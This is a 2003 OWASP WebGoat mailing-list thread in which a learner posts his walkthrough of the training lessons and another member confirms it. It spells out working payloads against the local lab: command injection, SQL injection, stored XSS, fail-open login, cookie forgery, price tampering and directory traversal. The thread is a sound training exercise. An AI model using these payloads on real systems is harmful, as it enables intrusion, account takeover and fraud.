[OWASP-WEBGOAT]WebGoat Walkthru? (May be a spoiler, so if you haven't completed the lessons, you may not want to look at it)

Dawes, Rogan (ZA - Johannesburg) rdawes at deloitte.co.za
Thu Nov 20 02:59:20 EST 2003


Hi Jeremy,
 
You seem to got everything covered so far.
 
In response to a couple of your questions:
 
BUT I FOUND THIS TO BE INTERESTING:  I stopped tomcat (java crash) and
reconnected to webgoat, and look what Tomcat threw out...this was actually
kind of funny... 

<snip> 
Successful connection to null 
http8080-Processor4 DROP TABLE user_data 
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null
primary key,first_name varcha 


This is done every time that WebGoat starts up, to make sure that you have a
clean database to work from. Obviously this would not happen in any kind of
production system ;-)

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little
crypt-o-gram 
type puzzle (jeff/jeff creates the cookie ggfkggfk whereas dave/dave creates
the 
cookie fwbefwbe, they're reversed and incremented by 1 letter).  This didn't
actually 
buy us anything as far as i can tell, except the 'AuthCookie'.  I logged in
with jeff/jeff and upon logging out, I noticed that the cookie had an
'AuthCookie=ggfkggfk' so I put it in the Cookie field of PenProcy and it
worked:

 

The key to this one is that if you start up webgoat, and supply a cookie of
"ggfkggfk", without ever trying to authenticate, you will be recognised as
Jeff, and fwbefwbe will get you access to Dave's account. The cookie IS
authentication, by itself.

 

Good going!

Rogan

P.S. to the WebGoat folks, perhaps you might want to mention WebScarab as a
tool that folks can use in their investigations of WebGoat?

 
 

-----Original Message-----
From: Jeremy Junginger [mailto:jj at act.com] 
Sent: 19 November 2003 07:33 PM
To: owasp-webgoat at lists.sourceforge.net
Subject: [OWASP-WEBGOAT]WebGoat Walkthru? (May be a spoiler, so if you
haven't completed the lessons, you may not want to look at it)



Hey guys, this is my first post to the group.  I have been getting familiar
with WebGoat and am about to play with the challenges, but I wanted to make
sure I'm on the right track before I continue.  Thanks!

TOOLS USED: 
PenProxy (HTTP Proxy that allows modification of many fields) 
Achilles (Another HTTP Proxy that was suggested) 
HTTrack (Tool for spidering websites) 
FormScalpel (Form manipulation and more) 

WALK-THRU?!?: 

HTTP BASICS:  I looked at this one for a couple hours before I decided it is
just a 
tutorial on HTTP.  
EXPLOIT: N/A (I may have missed something here) 

FAIL OPEN AUTHENTICATION:  This one took forever....the hints led me to
removing the 
password parameter, and "VIEW SOURCE" gave me the author's name "jeff", so I
tried 
jeff with "jeff" first just to see if it worked, and voila, but more
interesting is 
the fact that if you omit the password parameter completely and supply a
valid 
username (in this case, "jeff") it authenticates anyways. 
EXPLOIT: 
 <http://127.0.0.1:8080/WebGoat/attack?Username=jeff>
http://127.0.0.1:8080/WebGoat/attack?Username=jeff 
or 
 <http://127.0.0.1:8080/WebGoat/attack?Username=jeff&Password=jeff>
http://127.0.0.1:8080/WebGoat/attack?Username=jeff&Password=jeff 

HTML CLUES:  This was pretty much a gimme.  
<snip> 
    FIXME admin:adminpw 
</snip> 
EXPLOIT: 
 <http://127.0.0.1:8080/WebGoat/attack?Username=admin&Password=adminpw>
http://127.0.0.1:8080/WebGoat/attack?Username=admin&Password=adminpw 
which also yields: 
 <http://127.0.0.1:8080/WebGoat/attack?Username=jblow&Password=passwd1>
http://127.0.0.1:8080/WebGoat/attack?Username=jblow&Password=passwd1 
that also allows you to log in. 

PARAMETER INJECTION:  This one was pretty funny.  It reminded me of the
directory 
traversal/Unicode (ala NIMDA/CR/CR2) exploits.  The &, &&, |, and || can be
used to 
run additional commands that are available in the shell. 
EXPLOIT (examples): 
 <http://127.0.0.1:8080/WebGoat/attack?dir=&ipconfig&netstat>
http://127.0.0.1:8080/WebGoat/attack?dir=&ipconfig&netstat 
or enter the following in the form: 
&ipconfig&netstat&ping 127.0.0.1 

UNCHECKED EMAIL:  I'm not sure I get this one.  I see that you can send
malicious 
html emails, but didn't find much else.  I used: 
EXPLOIT?: 
TO:test at test.xom 
MESSAGE:<A href="http://www.playboy.com/ <http://www.playboy.com/>
">http://www.google.com <http://www.google.com> </A> 

SQL INJECTION:  This is a subject I am still pretty new at, but I took a
look at "SQL 
Injection" by Kevin Spett of SPI LABS, which led me to try inserting an
"always true" 
statement (1=1): 
EXPLOIT: 
Enter an account number:' or 1=1 
or 
Enter an account number:' or 0=0 
:) 

THREAD SAFETY:  I used the hints, and saw that if you open the two browsers
(and click fast enough) one users account gets sent to both userids.  Bad
stuff there.  I wouldn't want to see that in production...heheh

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little
crypt-o-gram 
type puzzle (jeff/jeff creates the cookie ggfkggfk whereas dave/dave creates
the 
cookie fwbefwbe, they're reversed and incremented by 1 letter).  This didn't
actually 
buy us anything as far as i can tell, except the 'AuthCookie'.  I logged in
with jeff/jeff and upon logging out, I noticed that the cookie had an
'AuthCookie=ggfkggfk' so I put it in the Cookie field of PenProcy and it
worked:

EXPLOIT: 
Using PenProxy, I added 'AuthCookie=ggfkggfk;' to the Cookie field 
BUT I FOUND THIS TO BE INTERESTING:  I stopped tomcat (java crash) and
reconnected to webgoat, and look what Tomcat threw out...this was actually
kind of funny...

<snip> 
Successful connection to null 
http8080-Processor4 DROP TABLE user_data 
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null
primary key,first_name varcha 
r(20),last_name varchar(20),cc_number varchar(30),cc_type varchar(10),) 
http8080-Processor4 INSERT INTO user_data VALUES
('101','Joe','Blow','987654321','VISA') 
http8080-Processor4 INSERT INTO user_data VALUES
('101','Joe','Blow','222200001111','MC') 
http8080-Processor4 INSERT INTO user_data VALUES
('102','John','Doe','222200002222','MC') 
http8080-Processor4 INSERT INTO user_data VALUES
('102','John','Doe','222200002222','AMEX') 
http8080-Processor4 INSERT INTO user_data VALUES
('103','Jane','Plane','123456789','MC') 
http8080-Processor4 INSERT INTO user_data VALUES
('103','Jane','Plane','333300003333','AMEX') 
http8080-Processor4 DROP TABLE user_system_data 
http8080-Processor4 CREATE TABLE user_system_data (userid varchar(5) not
null primary key,user_name 
varchar(12),password varchar(10),cookie varchar(30),) 
http8080-Processor4 INSERT INTO user_system_data VALUES
('101','jblow','passwd1', '') 
http8080-Processor4 INSERT INTO user_system_data VALUES
('102','jdoe','passwd2', '') 
http8080-Processor4 INSERT INTO user_system_data VALUES
('103','jplane','passwd3', '') 
http8080-Processor4 INSERT INTO user_system_data VALUES
('104','jeff','jeff', '') 
http8080-Processor4 INSERT INTO user_system_data VALUES
('105','dave','dave', '') 
http8080-Processor4 DROP TABLE product_system_data 
http8080-Processor4 CREATE TABLE product_system_data (productid varchar(6)
not null primary key,prod 
uct_name varchar(20),price varchar(10),) 
http8080-Processor4 INSERT INTO product_system_data VALUES ('32226','Dog
Bone','$1.99') 
http8080-Processor4 INSERT INTO product_system_data VALUES ('35632','DVD
Player','$214.99') 
http8080-Processor4 INSERT INTO product_system_data VALUES ('24569','60 GB
Hard Drive','$149.99') 
http8080-Processor4 INSERT INTO product_system_data VALUES ('56970','80 GB
Hard Drive','$179.99') 
http8080-Processor4 INSERT INTO product_system_data VALUES ('14365','56 inch
HDTV','$6999.99') 
http8080-Processor4 DROP TABLE messages 
http8080-Processor4 CREATE TABLE messages (num int not null primary
key,title varchar(50),message va 
rchar(1000),) 
Success: creating tables. 
Successfully refreshed the database. 
Wed Nov 19 11:05:08 GMT-07:00 2003 | x.x.x:x.x.x.x | WelcomeScreen | 
[Username=jeff,Password=jeff] 
</snip> 
(Is that cheating?  I think it may be) 

DATABASE XSS:  I just tried standard java "alert" messages, and found that
if you put the following in the message field and view it, it runs the code.

EXPLOIT: 
Message: <script language="javascript" type="text/javascript">alert("Put
Malware Here");</script> 
(Then click on message to view) 

HIDDEN FIELD TAMPERING:  I think I'm missing something here.  I saw that you
can just pass the price parameter as any number you want, so I just modified
the price parameter and got a television for .01, what a bargain!

EXPLOIT: 
 <http://10.40.32.111:8080/WebGoat/attack?Price=.01>
http://10.40.32.111:8080/WebGoat/attack?Price=.01 

WEAK ACCESS CONTROL (SHOULD BE DIRECTORY TRAVERSAL?): All I could find on
this one was that it allowed directory traversal.  Pretty much trial and
error on this one.  Anyone find this another way?

EXPLOIT: 
Filename:../ 
or 
Filename:../../ 
grants access to TOP SECRET stuff. 

CHALLENGES:  I am getting ready to work on these.  But I wanted to make sure
I haven't overlooked any obvious stuff in the above exercises.  Thanks for
your input on this, and have a great day!

-Jeremy 

  

This e-mail message and all attachments transmitted with it may be
confidential and are intended solely for the addressee(s). If you are not
the intended recipient or the person responsible for delivering it to the
intended recipient, you are hereby notified that any reading, dissemination,
distribution, copying, or other use of this message or its attachment(s) is
strictly prohibited.  If you receive this email in error, please immediately
notify the sender of the message or Best Software, Inc. by e-mailing
postmaster at bestsoftware.com and destroy all copies of this message.  Best
Software, for the protection of our internal systems and those of our
customers, does block most email attachments.


Important Notice: This email is subject to important restrictions, qualifications and disclaimers ("the Disclaimer") that must be accessed and read by clicking here or by copying and pasting the following address into your Internet browser's address bar: http://www.Deloitte.co.za/Disc.htm. The Disclaimer is deemed to form part of the content of this email in terms of Section 11 of the Electronic Communications and Transactions Act, 25 of 2002. If you cannot access the Disclaimer, please obtain a copy thereof from us by sending an email to ClientServiceCentre at Deloitte.co.za.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20031120/45b2ef0f/attachment.html 


More information about the Owasp-webgoat mailing list